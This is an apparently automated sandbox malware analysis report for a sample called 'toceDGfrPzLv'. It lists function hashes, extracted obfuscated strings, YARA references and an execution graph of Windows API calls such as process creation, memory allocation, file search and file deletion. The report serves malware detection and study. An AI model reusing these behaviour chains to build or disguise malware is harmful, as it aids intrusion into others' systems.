                • Instruction Fuzzy Hash: 71118E75A00359BFE710EFA9DC45FAF77A8EF85710F00854AFD145B281EB7069018BA5
                Function 03456C95 Relevance: .1, Instructions: 63COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f3714438706259403f372e0dc758f64dbb6f7a2eb51d72a2246fd91c555d2c28
                • Instruction ID: 1640d65e759d0a44646927cc30ca86894216d1df72a9e90bac4f09ae02618be3
                • Opcode Fuzzy Hash: f3714438706259403f372e0dc758f64dbb6f7a2eb51d72a2246fd91c555d2c28
                • Instruction Fuzzy Hash: 07111FB6D0121CAF8B00DFE9DC419EFBBF9EF49200F54416EE919EB200E7715A048BA1
                Function 03459C35 Relevance: .0, Instructions: 47COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 38dcccab76c19756cfad6db72e33ff0aa66d3d5edec3420a69c5b5e22c34f49f
                • Instruction ID: ab2fca9c3cd2095b0d72136dd336e7436656e6378d1643086750bc42a07055b0
                • Opcode Fuzzy Hash: 38dcccab76c19756cfad6db72e33ff0aa66d3d5edec3420a69c5b5e22c34f49f
                • Instruction Fuzzy Hash: C001C4B6204249BFCB44DE89DC81EEB77ADAF8D750F008208BA09A7240D631FC518BA4
                Function 034558C5 Relevance: .0, Instructions: 46COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 49bd5c77ef24337397b36aee5451c10217494e18f8d9126c85897e15e0498181
                • Instruction ID: 428ee970cf7b283932ec6d333716e46751b6130283006bd98bc50f2053edeadb
                • Opcode Fuzzy Hash: 49bd5c77ef24337397b36aee5451c10217494e18f8d9126c85897e15e0498181
                • Instruction Fuzzy Hash: 9D011BB2D01218AFCB40DFE8C9409EEBBF8AB08200F14466EE915F7200E7345A048FA5
                Function 034347EB Relevance: .0, Instructions: 42COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ae062cf4e1130528d93ad9a2214452a35971f8e86c9e8e4b9cda902310488008
                • Instruction ID: 0eb09d9dbb7c13e72097d64fbe682af6b4abf8d4e4b679962a72fda664e8e523
                • Opcode Fuzzy Hash: ae062cf4e1130528d93ad9a2214452a35971f8e86c9e8e4b9cda902310488008
                • Instruction Fuzzy Hash: 55F0B4B7A102525FD7149E6EAC84B96F79CEB89221F240227F81CDF381D772D41283A4
                Function 03458E75 Relevance: .0, Instructions: 33COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b914cd2626a6c29d2f16214733a60749db5ca0f128615ad9bb86b3389feeb6e4
                • Instruction ID: 80d3e1ddd1ea0ed6bdee23099f5fa09a390305d4434d505ea249c3046ab81e93
                • Opcode Fuzzy Hash: b914cd2626a6c29d2f16214733a60749db5ca0f128615ad9bb86b3389feeb6e4
                • Instruction Fuzzy Hash: F2F01CB52002097FD710EF99DC81EEB77ADEFC9751F008519BA18AB241D670BD518BB8
                Function 03448665 Relevance: .0, Instructions: 29COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7f93725e24ed1f579387a087c9790d360d289ea67e09254a132eb2aba5884eaa
                • Instruction ID: ba5269579821f906beb649a623e7eaf9d0c08465d4d025b82a3f6b5638d34503
                • Opcode Fuzzy Hash: 7f93725e24ed1f579387a087c9790d360d289ea67e09254a132eb2aba5884eaa
                • Instruction Fuzzy Hash: EDF05E7180520CABDB14CF64D841BDEBBB8EB04320F1043AAE8289B280D63597548785
                Function 03459835 Relevance: .0, Instructions: 25COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: eb59faf3b5f3930f1af6bf4b5e54f6bf374c1ede358e3a2ac458fab30b9232ef
                • Instruction ID: 309380db59c3b0c34c7c0a77db34f5973d14fe3099df5af5d2ec450e155048c3
                • Opcode Fuzzy Hash: eb59faf3b5f3930f1af6bf4b5e54f6bf374c1ede358e3a2ac458fab30b9232ef
                • Instruction Fuzzy Hash: A9E08679640205BFC210FA5ACC40FE7775CDFC5750F01401AFA086B241D670B90487F4
                Function 03434866 Relevance: .0, Instructions: 21COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3e5521065b6c4434e94dc97268a49119e66ff6fabcab21a72083bb16b5f38695
                • Instruction ID: fd74f3375835a194c76e54198795d816e4f6e2219bee6b6617e039cf6368a753
                • Opcode Fuzzy Hash: 3e5521065b6c4434e94dc97268a49119e66ff6fabcab21a72083bb16b5f38695
                • Instruction Fuzzy Hash: FAD02B378182929A8724DE6D5808481F380E98A2343250333C4AD6F390DA3290128394
                Function 0343B3BF Relevance: .0, Instructions: 4COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6a9258deeda3753f544c5d02b51994ede95215adf95ba81f3ae8d3cc9f2cf774
                • Instruction ID: cb1b39bd271d8ec2371583b4ed9f25bb62e86aab770711b1a0c78f5bdf3edcb9
                • Opcode Fuzzy Hash: 6a9258deeda3753f544c5d02b51994ede95215adf95ba81f3ae8d3cc9f2cf774
                • Instruction Fuzzy Hash: 9C90023544075C4F5A01BA51450046C2333A98B527750114EA4454D14987584D52D54A

                Non-executed Functions

                Function 05F86BA0 Relevance: 22.9, Strings: 18, Instructions: 396COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.4609561064.0000000005F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 05F20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_5f20000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: #$$$)$.d$/$2h$M$P$Q$Rq$S$W$[$[X$]$]$l~$ns
                • API String ID: 0-372488337
                • Opcode ID: a1f442241f27ccd1c1e80f0c22fc35621796bd99b258a5295efd0ea845c55b99
                • Instruction ID: 6b8234aba5f47026c5d9907fecf5c35509794ec55ed6627913faf166d9fc89a1
                • Opcode Fuzzy Hash: a1f442241f27ccd1c1e80f0c22fc35621796bd99b258a5295efd0ea845c55b99
                • Instruction Fuzzy Hash: 7322A3B0D06229CBEB24DF44CD94BEDBBB2FB44308F2082D9D4196B294D7B95A85CF45
                Function 05F83659 Relevance: .0, Instructions: 13COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.4609561064.0000000005F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 05F20000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_5f20000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 41937b1012ff902b3ab2718d462fa0392f22e2bf28beb6feaca13bf66379697c
                • Instruction ID: 38adc03d03e252d8a761ced4759d8021f2ca021f7b2d01ff98b49db29c03daac
                • Opcode Fuzzy Hash: 41937b1012ff902b3ab2718d462fa0392f22e2bf28beb6feaca13bf66379697c
                • Instruction Fuzzy Hash: 01B09202A0A0A4124510094AB9121B4FF64C08B2B3B6023E2DD6CA30900003821141AD
                Function 034443D9 Relevance: 73.9, Strings: 59, Instructions: 192COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$456789+/$89:;$<=@@$@$@@@>$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
                • API String ID: 0-3592660292
                • Opcode ID: 8cf7ae990444367906e8b8366c12b82804f94781d7c1690ea42afaaaebb703ba
                • Instruction ID: 54324edeacdde1d452a23f674b3436f59c05a2d7e1c1dc11770d949e477d59a9
                • Opcode Fuzzy Hash: 8cf7ae990444367906e8b8366c12b82804f94781d7c1690ea42afaaaebb703ba
                • Instruction Fuzzy Hash: AAA11FF09052988EDB118F59A4603DFBF71BB95204F1581E9C6AA7B243C3BE4E46DF90
                Function 03434482 Relevance: 25.1, Strings: 20, Instructions: 52COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: `{r$ ;}g$!:ir$7}ff$: =?$;97r$;<&=$>>3}$R$adrz$ae|a$ae|ad$bcb$cggr$d$fba|$gae|$g|br$rrc$|b|`
                • API String ID: 0-3927445087
                • Opcode ID: 507e915d63d33ed6683f2258d2e1fda7c2d7b14db9e087e0539d36ea5eb421a6
                • Instruction ID: 0ac3e8e120af78b0bfa8a1b645105d2399b95387a349c406141f6c81839125bb
                • Opcode Fuzzy Hash: 507e915d63d33ed6683f2258d2e1fda7c2d7b14db9e087e0539d36ea5eb421a6
                • Instruction Fuzzy Hash: 6A21DAB4C042889ACB20CFE6E681ADDBF30BB08744F60824DE5142F359D3364A46CF9A
                Function 0343AD25 Relevance: 16.3, Strings: 13, Instructions: 95COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: ,$20$@=$@g$D{$GM$JH$Un$Z$[$x$}-$D
                • API String ID: 0-3204514973
                • Opcode ID: 234af3e0abfef0f7f0eb7429542b1d81a6b479afb8596d5c013d25d84052a7aa
                • Instruction ID: fecd71b2b931b1ff7034236a3ac81a8bada6a78d5aa5a9069656a333bb208ff1
                • Opcode Fuzzy Hash: 234af3e0abfef0f7f0eb7429542b1d81a6b479afb8596d5c013d25d84052a7aa
                • Instruction Fuzzy Hash: 88515CB0D05769CBEB64CF85C9987DEBBB5BB05308F1081D9C1597B281CBB90A88CF95
                Function 0343F15E Relevance: 13.8, Strings: 11, Instructions: 87COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: D$\$e$e$i$l$n$r$r$w$x
                • API String ID: 0-685823316
                • Opcode ID: 05bb34da8be068fee36b51e9befd80bca9ee329d9ed7db0fe45d8609f5136049
                • Instruction ID: eb42a40eaf8b838712ed7a2fb788256b6e3697463649c451aa862d1daf380ad4
                • Opcode Fuzzy Hash: 05bb34da8be068fee36b51e9befd80bca9ee329d9ed7db0fe45d8609f5136049
                • Instruction Fuzzy Hash: F93187B5D51318AEEF50DFA0CC45BEE7BB9AF08704F00415DE908BA180DBB51648CFA5
                Function 03437EA5 Relevance: 10.0, Strings: 8, Instructions: 43COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: +$4$G$N$P$U$Y$s
                • API String ID: 0-1622545119
                • Opcode ID: 6b390e237c24d5d5cb4918a4641d15ac290e3a2be0468e255aee23930ccd69f9
                • Instruction ID: eded51959d692198eae296fca0f5b0524d79ce7a5f6760b6f1aed6fcd02c0019
                • Opcode Fuzzy Hash: 6b390e237c24d5d5cb4918a4641d15ac290e3a2be0468e255aee23930ccd69f9
                • Instruction Fuzzy Hash: 3011DB50D187CAD9DB12C7BC88182AEBF715F27224F1883C9D5F52B2C2C2794706DBA6
                Function 03446805 Relevance: 6.3, Strings: 5, Instructions: 88COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: -$-$1$8$_
                • API String ID: 0-1233760830
                • Opcode ID: 963761da192a14defe4578f79a0750e1d8fc611b9137b9e3c5174a821733ae5a
                • Instruction ID: 59bea5c88eded298c9915f1c818797d7d3895fbb6e87678ecde3223abf0063e5
                • Opcode Fuzzy Hash: 963761da192a14defe4578f79a0750e1d8fc611b9137b9e3c5174a821733ae5a
                • Instruction Fuzzy Hash: 893123B5D10209BBEB00DB95DC41BEE77B8EF59304F004199F908AE241EB75AA458BE9
                Function 034342A5 Relevance: 5.0, Strings: 4, Instructions: 23COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.4606359910.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 031A0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_31a0000_toceDGfrPzLv.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: J$ds$q;wz$q;wzds
                • API String ID: 0-4046768835
                • Opcode ID: ee67b16ee06f0986a74ec1e4f202ed80a4e75393ef3f0bd6978feb0415e4f658
                • Instruction ID: 716bbd235c15f2ea74db2aee334e76f06944b4b178854c6c5efcd41ae0a97cec
                • Opcode Fuzzy Hash: ee67b16ee06f0986a74ec1e4f202ed80a4e75393ef3f0bd6978feb0415e4f658
                • Instruction Fuzzy Hash: 98E09B70C0424CAACB05EFEAD841AADBB74EB01600F504ED9D9149F241D77486048786

                Execution Graph

                Execution Coverage:2.5%
                Dynamic/Decrypted Code Coverage:4.2%
                Signature Coverage:1.6%
                Total number of Nodes:448
                Total number of Limit Nodes:70
                execution_graph 99057 53a950 99062 53a660 99057->99062 99059 53a95d 99078 53a2e0 99059->99078 99061 53a979 99063 53a685 99062->99063 99090 537f90 99063->99090 99066 53a7d0 99066->99059 99068 53a7e7 99068->99059 99070 53a7de 99070->99068 99073 53a8d5 99070->99073 99109 5449c0 99070->99109 99114 539d30 99070->99114 99072 5449c0 GetFileAttributesW 99072->99073 99073->99072 99075 53a93a 99073->99075 99123 53a0a0 99073->99123 99127 54afc0 99075->99127 99079 53a2f6 99078->99079 99082 53a301 99078->99082 99080 54b0a0 RtlAllocateHeap 99079->99080 99080->99082 99081 53a322 99081->99061 99082->99081 99083 537f90 GetFileAttributesW 99082->99083 99084 53a632 99082->99084 99087 5449c0 GetFileAttributesW 99082->99087 99088 539d30 RtlFreeHeap 99082->99088 99089 53a0a0 RtlFreeHeap 99082->99089 99083->99082 99085 53a64b 99084->99085 99086 54afc0 RtlFreeHeap 99084->99086 99085->99061 99086->99085 99087->99082 99088->99082 99089->99082 99091 537f9c 99090->99091 99092 537fb8 GetFileAttributesW 99091->99092 99093 537fc3 99091->99093 99092->99093 99093->99066 99094 542ec0 99093->99094 99095 542ece 99094->99095 99096 542ed5 99094->99096 99095->99070 99130 534140 99096->99130 99099 542f19 99105 5430c7 99099->99105 99134 54b0a0 99099->99134 99102 542f32 99103 5430bd 99102->99103 99102->99105 99106 542f4e 99102->99106 99104 54afc0 RtlFreeHeap 99103->99104 99103->99105 99104->99105 99105->99070 99106->99105 99107 54afc0 RtlFreeHeap 99106->99107 99108 5430b1 99107->99108 99108->99070 99110 544a2c 99109->99110 99111 544a63 99110->99111 99141 537fe0 99110->99141 99111->99070 99113 544a45 99113->99070 99115 539d56 99114->99115 99146 53d770 99115->99146 99117 539dc8 99119 539f50 99117->99119 99120 539de6 99117->99120 99118 539f35 99118->99070 99119->99118 99121 539bf0 RtlFreeHeap 99119->99121 99120->99118 99151 539bf0 99120->99151 99121->99119 99124 53a0c6 99123->99124 99125 53d770 RtlFreeHeap 99124->99125 99126 53a14d 99125->99126 99126->99073 99159 549260 99127->99159 99129 53a941 99129->99059 99131 534164 99130->99131 99132 5341a0 LdrLoadDll 99131->99132 99133 53416b 99131->99133 99132->99133 99133->99099 99137 542980 LdrLoadDll 99133->99137 99138 549210 99134->99138 99136 54b0bb 99136->99102 99137->99099 99139 54922d 99138->99139 99140 54923e RtlAllocateHeap 99139->99140 99140->99136 99142 537fb6 99141->99142 99143 53800c 99141->99143 99144 537fb8 GetFileAttributesW 99142->99144 99145 537fc3 99142->99145 99144->99145 99145->99113 99148 53d787 99146->99148 99147 53d79e 99147->99117 99148->99147 99149 54afc0 RtlFreeHeap 99148->99149 99150 53d7e1 99149->99150 99150->99117 99152 539c0d 99151->99152 99155 53d7f0 99152->99155 99154 539d13 99154->99120 99156 53d814 99155->99156 99157 53d8be 99156->99157 99158 54afc0 RtlFreeHeap 99156->99158 99157->99154 99158->99157 99160 54927d 99159->99160 99161 54928e RtlFreeHeap 99160->99161 99161->99129 99393 53c210 99395 53c239 99393->99395 99394 53c33d 99395->99394 99396 53c2e3 FindFirstFileW 99395->99396 99396->99394 99398 53c2fe 99396->99398 99397 53c324 FindNextFileW 99397->99398 99399 53c336 FindClose 99397->99399 99398->99397 99399->99394 99400 536990 99401 5369ba 99400->99401 99404 537b50 99401->99404 99403 5369e1 99405 537b6d 99404->99405 99411 548620 99405->99411 99407 537bbd 99408 537bc4 99407->99408 99409 548700 LdrInitializeThunk 99407->99409 99408->99403 99410 537bed 99409->99410 99410->99403 99412 5486bb 99411->99412 99413 54864e 99411->99413 99416 2ed2f30 LdrInitializeThunk 99412->99416 99413->99407 99414 5486f4 99414->99407 99416->99414 99162 548e50 99163 548ec4 99162->99163 99164 548e7b 99162->99164 99165 548eda NtDeleteFile 99163->99165 99417 53701d 99418 536fc1 99417->99418 99419 536fd2 99418->99419 99420 53ae80 9 API calls 99418->99420 99420->99419 99421 529c00 99424 529eb2 99421->99424 99423 52a328 99424->99423 99425 54ac20 99424->99425 99426 54ac46 99425->99426 99431 524150 99426->99431 99428 54ac8b 99428->99423 99429 54ac52 99429->99428 99434 545170 99429->99434 99438 532e00 99431->99438 99433 52415d 99433->99429 99435 5451d2 99434->99435 99437 5451df 99435->99437 99449 5315f0 99435->99449 99437->99428 99439 532e1a 99438->99439 99441 532e33 99439->99441 99442 549940 99439->99442 99441->99433 99443 54995a 99442->99443 99444 549989 99443->99444 99445 548530 LdrInitializeThunk 99443->99445 99444->99441 99446 5499e9 99445->99446 99447 54afc0 RtlFreeHeap 99446->99447 99448 549a02 99447->99448 99448->99441 99450 53162b 99449->99450 99465 537ab0 99450->99465 99452 531633 99453 531900 99452->99453 99454 54b0a0 RtlAllocateHeap 99452->99454 99453->99437 99455 531649 99454->99455 99456 54b0a0 RtlAllocateHeap 99455->99456 99457 53165a 99456->99457 99458 54b0a0 RtlAllocateHeap 99457->99458 99459 531668 99458->99459 99463 5316f9 99459->99463 99480 536620 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99459->99480 99461 534140 LdrLoadDll 99462 5318b2 99461->99462 99476 547ab0 99462->99476 99463->99461 99466 537adc 99465->99466 99467 5379a0 2 API calls 99466->99467 99468 537aff 99467->99468 99469 537b21 99468->99469 99470 537b09 99468->99470 99472 537b3d 99469->99472 99474 548ef0 NtClose 99469->99474 99471 537b14 99470->99471 99473 548ef0 NtClose 99470->99473 99471->99452 99472->99452 99473->99471 99475 537b33 99474->99475 99475->99452 99477 547b12 99476->99477 99479 547b1f 99477->99479 99481 531910 99477->99481 99479->99453 99480->99463 99497 537d80 99481->99497 99483 531e83 99483->99479 99484 531930 99484->99483 99501 540c60 99484->99501 99487 531b41 99489 54c2b0 2 API calls 99487->99489 99488 53198e 99488->99483 99504 54c180 99488->99504 99491 531b56 99489->99491 99490 537d20 LdrInitializeThunk 99493 531ba6 99490->99493 99491->99493 99509 530440 99491->99509 99493->99483 99493->99490 99494 530440 LdrInitializeThunk 99493->99494 99494->99493 99495 531cf7 99495->99493 99496 537d20 LdrInitializeThunk 99495->99496 99496->99495 99498 537d8d 99497->99498 99499 537db5 99498->99499 99500 537dae SetErrorMode 99498->99500 99499->99484 99500->99499 99502 54af30 NtAllocateVirtualMemory 99501->99502 99503 540c81 99502->99503 99503->99488 99505 54c196 99504->99505 99506 54c190 99504->99506 99507 54b0a0 RtlAllocateHeap 99505->99507 99506->99487 99508 54c1bc 99507->99508 99508->99487 99512 549170 99509->99512 99513 54918d 99512->99513 99516 2ed2c70 LdrInitializeThunk 99513->99516 99514 530462 99514->99495 99516->99514 99517 536d80 99518 536d9c 99517->99518 99521 536def 99517->99521 99520 548ef0 NtClose 99518->99520 99518->99521 99519 536f27 99524 536db7 99520->99524 99521->99519 99528 536150 NtClose LdrInitializeThunk LdrInitializeThunk 99521->99528 99523 536f01 99523->99519 99529 536320 NtClose LdrInitializeThunk LdrInitializeThunk 99523->99529 99527 536150 NtClose LdrInitializeThunk LdrInitializeThunk 99524->99527 99527->99521 99528->99523 99529->99519 99168 538447 99169 538401 99168->99169 99169->99168 99170 538471 99169->99170 99172 536bb0 LdrInitializeThunk LdrInitializeThunk 99169->99172 99172->99169 99535 541280 99536 54129c 99535->99536 99537 5412c4 99536->99537 99538 5412d8 99536->99538 99539 548ef0 NtClose 99537->99539 99540 548ef0 NtClose 99538->99540 99541 5412cd 99539->99541 99542 5412e1 99540->99542 99545 54b0e0 RtlAllocateHeap 99542->99545 99544 5412ec 99545->99544 99556 52b130 99557 52b13b 99556->99557 99558 54af30 NtAllocateVirtualMemory 99557->99558 99559 52c7a1 99558->99559 99174 53fc70 99175 53fc8d 99174->99175 99176 534140 LdrLoadDll 99175->99176 99177 53fcab 99176->99177 99560 5357b0 99561 537d20 LdrInitializeThunk 99560->99561 99562 5357e0 99561->99562 99564 53580c 99562->99564 99565 537ca0 99562->99565 99566 537ce4 99565->99566 99571 537d05 99566->99571 99572 548200 99566->99572 99568 537cf5 99569 537d11 99568->99569 99570 548ef0 NtClose 99568->99570 99569->99562 99570->99571 99571->99562 99573 54827d 99572->99573 99574 54822e 99572->99574 99577 2ed4650 LdrInitializeThunk 99573->99577 99574->99568 99575 5482a2 99575->99568 99577->99575 99578 5309b0 99579 5309b7 99578->99579 99580 534140 LdrLoadDll 99579->99580 99581 5309e7 99580->99581 99582 530a33 99581->99582 99583 530a20 PostThreadMessageW 99581->99583 99583->99582 99178 532377 99179 532398 99178->99179 99182 535ec0 99179->99182 99181 5323a3 99183 535ef3 99182->99183 99184 535f17 99183->99184 99189 548a60 99183->99189 99184->99181 99186 535f3a 99186->99184 99193 548ef0 99186->99193 99188 535fbc 99188->99181 99190 548a7a 99189->99190 99196 2ed2ca0 LdrInitializeThunk 99190->99196 99191 548aa6 99191->99186 99194 548f0a 99193->99194 99195 548f1b NtClose 99194->99195 99195->99188 99196->99191 99197 548bf0 99198 548c22 99197->99198 99199 548ca7 99197->99199 99200 548cbd NtCreateFile 99199->99200 99584 547e30 99585 547e4d 99584->99585 99586 547e5e RtlDosPathNameToNtPathName_U 99585->99586 99201 532cfc 99206 5379a0 99201->99206 99204 532d28 99205 548ef0 NtClose 99205->99204 99207 5379ba 99206->99207 99211 532d0c 99206->99211 99212 5485d0 99207->99212 99210 548ef0 NtClose 99210->99211 99211->99204 99211->99205 99213 5485ea 99212->99213 99216 2ed35c0 LdrInitializeThunk 99213->99216 99214 537a8a 99214->99210 99216->99214 99587 529ba0 99588 529baf 99587->99588 99589 529bf0 99588->99589 99590 529bdd CreateThread 99588->99590 99217 536f60 99218 536f78 99217->99218 99220 536fd2 99217->99220 99218->99220 99221 53ae80 99218->99221 99222 53ae8a 99221->99222 99223 53b0d9 99222->99223 99248 5492f0 99222->99248 99223->99220 99225 53af1c 99225->99223 99251 54c2b0 99225->99251 99227 53af3b 99227->99223 99228 53b012 99227->99228 99257 548530 99227->99257 99230 535730 LdrInitializeThunk 99228->99230 99232 53b031 99228->99232 99230->99232 99236 53b0c1 99232->99236 99268 5480a0 99232->99268 99233 53affa 99264 537d20 99233->99264 99234 53afd8 99283 544300 LdrInitializeThunk 99234->99283 99235 53afa6 99235->99223 99235->99233 99235->99234 99261 535730 99235->99261 99242 537d20 LdrInitializeThunk 99236->99242 99244 53b0cf 99242->99244 99243 53b098 99273 548150 99243->99273 99244->99220 99246 53b0b2 99278 5482b0 99246->99278 99249 54930d 99248->99249 99250 54931e CreateProcessInternalW 99249->99250 99250->99225 99252 54c220 99251->99252 99253 54c27d 99252->99253 99254 54b0a0 RtlAllocateHeap 99252->99254 99253->99227 99255 54c25a 99254->99255 99256 54afc0 RtlFreeHeap 99255->99256 99256->99253 99258 54854a 99257->99258 99284 2ed2c0a 99258->99284 99259 53af9d 99259->99228 99259->99235 99287 548700 99261->99287 99263 53576b 99263->99234 99265 537d33 99264->99265 99293 548430 99265->99293 99267 537d5e 99267->99220 99269 54811d 99268->99269 99270 5480ce 99268->99270 99299 2ed39b0 LdrInitializeThunk 99269->99299 99270->99243 99271 548142 99271->99243 99274 5481ca 99273->99274 99275 54817b 99273->99275 99300 2ed4340 LdrInitializeThunk 99274->99300 99275->99246 99276 5481ef 99276->99246 99279 54832a 99278->99279 99281 5482db 99278->99281 99301 2ed2fb0 LdrInitializeThunk 99279->99301 99280 54834f 99280->99236 99281->99236 99283->99233 99285 2ed2c1f LdrInitializeThunk 99284->99285 99286 2ed2c11 99284->99286 99285->99259 99286->99259 99288 5487ad 99287->99288 99290 54872e 99287->99290 99292 2ed2d10 LdrInitializeThunk 99288->99292 99289 5487f2 99289->99263 99290->99263 99292->99289 99294 5484ab 99293->99294 99296 54845b 99293->99296 99298 2ed2dd0 LdrInitializeThunk 99294->99298 99295 5484d0 99295->99267 99296->99267 99298->99295 99299->99271 99300->99276 99301->99280 99302 53f3e0 99303 53f444 99302->99303 99304 535ec0 2 API calls 99303->99304 99306 53f577 99304->99306 99305 53f57e 99306->99305 99331 535fd0 99306->99331 99308 53f723 99309 53f5fa 99309->99308 99310 53f732 99309->99310 99335 53f1c0 99309->99335 99311 548ef0 NtClose 99310->99311 99313 53f73c 99311->99313 99314 53f636 99314->99310 99315 53f641 99314->99315 99316 54b0a0 RtlAllocateHeap 99315->99316 99317 53f66a 99316->99317 99318 53f673 99317->99318 99319 53f689 99317->99319 99321 548ef0 NtClose 99318->99321 99344 53f0b0 CoInitialize 99319->99344 99323 53f67d 99321->99323 99322 53f697 99346 5489b0 99322->99346 